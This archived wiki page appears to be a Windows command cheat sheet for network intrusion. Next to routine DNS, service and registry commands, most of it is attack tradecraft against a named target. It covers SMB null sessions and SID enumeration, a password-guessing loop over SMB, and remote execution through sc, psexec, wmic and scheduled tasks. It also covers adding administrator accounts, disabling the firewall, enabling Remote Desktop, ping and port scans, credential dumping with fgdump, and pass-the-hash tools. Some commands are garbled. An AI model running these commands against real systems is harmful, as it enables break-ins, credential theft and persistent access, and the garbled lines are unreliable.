Wiki: Windows Commands

WARNING: Wiki content is an archive, no promise about quality!



  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV

    nslookup <site>

  • Interactive mode:

    nslookup > [name or ip] > server [server ip] > set type=any > ls -d [target_domain] [> filename] > view [filename]

  • No recurse:

    > set norecurse > set recurse




  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait for Nms before timing out (default 4000)

SMB session

Establishing a null session

net use \\&lt;target&gt; "" /u:""

Establishing an authenticated session

net use \\&lt;target&gt; &lt;password&gt; /u:&lt;username&gt;

Mount a share

net use * \\&lt;target&gt;\&lt;share&gt; &lt;password&gt; /u:&lt;username&gt;
net use * \\&lt;target&gt;\&lt;share&gt; &lt;password&gt; /u:&lt;machinename&gt;\&lt;username&gt;
net use * \\&lt;target&gt;\c$ &lt;password&gt; /u:&lt;username&gt;

Dropping SMB sessions

net use \\&lt;target&gt; /del

Dropping all SMB sessions (bad idea)

net use * /del

Pulling credentials (w/ SMB session)

Pulling credentials

enum -U &lt;target&gt;
enum -G &lt;target&gt;


  • Outputs in the form S-X-Y-target_sid-RID

    user2sid \<target> <machine_name>


  • Requires spaces instead of dashes

    sid2user \<target> 5 <target_sid> <N>

    for /L %i in (1000, 1, 1050) do @sid2user \<target> 5 <target_sid> %i


Finding client-side programs

dir /s "c:\Program Files"

dir /s /b "c:\Program Files\*.exe"

Service interaction

List running services

sc query

List all services

sc query state= all

List all service names

sc query state= all | find "SERVICE_NAME"

Query service information

sc query &lt;servicename&gt;
sc qc &lt;servicename&gt;

Start a service

sc config &lt;servicename&gt; start= demand
sc start &lt;servicename&gt;

Starting telnet

sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr

Starting terminal services

sc query termservice
sc config termservice start= demand
sc start termservice

Using sc to invoke an executable

net use \\&lt;target&gt; &lt;password&gt; /u:&lt;username&gt;
sc \\&lt;target&gt; create &lt;name&gt; binpath= &lt;command&gt;
sc \\&lt;target&gt; start &lt;name&gt;

Making that service invoke another executable

sc \\&lt;target&gt; &lt;name&gt; create binpath= "cmd.exe /k &lt;command&gt;"


Finding environmental variables


Finding a specific variable

set &lt;variable&gt;
echo %&lt;variable&gt;%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%

Users and groups

Listing users

net user

Creating a user

net user &lt;username&gt; &lt;password&gt; /add

Listing groups

net localgroup

Creating a group

net localgroup &lt;groupname&gt; /add

Adding a user to a group

net localgroup &lt;groupname&gt; &lt;username&gt; /add

Adding a user to the telnet users group

net user &lt;username&gt; &lt;password&gt; /add
net localgroup TelnetClients /add
net localgroup TelnetClients &lt;username&gt; /add

Adding a user to the terminal services group

net localgroup "Remote Desktop Users" &lt;username&gt; /add

List administrators

net localgroup administrators

Add an administrator

net user &lt;username&gt; %lt;password&gt; /add
net localgroup administrators &lt;username&gt; /add

Remove a user from a group

net localgroup &lt;group&gt; &lt;username&gt; /del

Delete a user

net user &lt;username&gt; /del

Firewall interaction


netsh /?

Show config

netsh firewall show config

Open a specific port

netsh firewall add portopening protocol = &lt;TCP|UDP&gt; port = &lt;port&gt; name = &lt;comment&gt; scope = custom addresses = &lt;address/CIDR&gt;

Remove the port opening

netsh firewall del portopening protocol = &lt;TCP|UDP&gt; port = &lt;port&gt;

Disable the firewall completely (bad idea)

netsh firewall set opmode disable

Opening the firewall for telnet

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = &lt;address&gt;

Opening the firewall for terminal services

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = &lt;address&gt;

Opening the firewall for SSH

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = &lt;address&gt;

Registry interaction

Query a key

reg query &lt;keyname&gt;

Adding a key

reg add &lt;keyname&gt; /v &lt;valuename&gt; /t &lt;type&gt; /d &lt;data&gt;

Export data

reg export &lt;keyname&gt; &lt;filename.reg&gt;

Import data

reg import &lt;filename.reg&gt;

Enabling terminal services

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0


Finding a port

netstat -an | find "&lt;port&gt;"


Dump the DNS cache

ipconfig /displaydns


Dump the ARP cache

arp -a


/L loop

for /L %i in (&lt;start&gt;,&lt;step&gt;,&lt;stop&gt;) do &lt;command&gt;


for /L %i in (1,1,255) do @echo %i

Ping scanning

for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"

DNS bruteforce

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

/F loop

for /F ["&lt;options&gt;"] %i in (&lt;stuff&gt;) do &lt;command&gt;

Looping through passwords

for /F %i in (password.lst) do @echo %i & @net use \\&lt;target&gt; %i /u:&lt;username&gt; 2>nul && pause

Portscanning from a file

for /F %i in (ports.txt) do @nc -n -vv -w3 %i


Using psexec (sysinternals)

  • -s to run as system
  • -c to copy the program to the target first
  • -d to run in "detached" mode (no console)

    psexec \<target> -d -u <user> -p <password> <command>


Starting the scheduler service

net use \\&lt;target&gt; &lt;password&gt; &lt;username&gt;
sc [\\&lt;target&gt;] query schedule
sc [\\&lt;target&gt;] start schedule

Scheduling with at:

at [\\&lt;target&gt;] &lt;HH:MM&gt;&lt;A|P&gt; &lt;command&gt;

Scheduling with schtasks

schtasks /create /tn &lt;taskname&gt; /s &lt;target&gt; /u &lt;user&gt; /p &lt;password&gt; /sc &lt;frequency&gt; /st &lt;starttime&gt; /sd &lt;startdate&gt; /tr &lt;command&gt;


Running a program

wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process call create &lt;command&gt;

List processes

wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process list brief

wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process where processid="&lt;pid&gt;" delete

wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process where name="&lt;name&gt;" delete


Account lockout

Info on Windows accounts

net accounts
net accounts /domain



  • -c -- don't get cached credentials
  • -h <target>
  • -u <username>

    fgdump -c -h <target> -u <username>

Pass-the-hash toolkit (psh-toolkit)

Trend finally noticed/deleted these programs, so I don't have their parameters handy

  • whosthere-exe
  • genhash.exe
  • iam.exe

Helpful hints


Download a file as anonymous

ftp -A -s:ftp-script.txt &lt;host&gt;

The script

get &lt;file&gt;

An even better script, that grabs everything in the base directory

mget .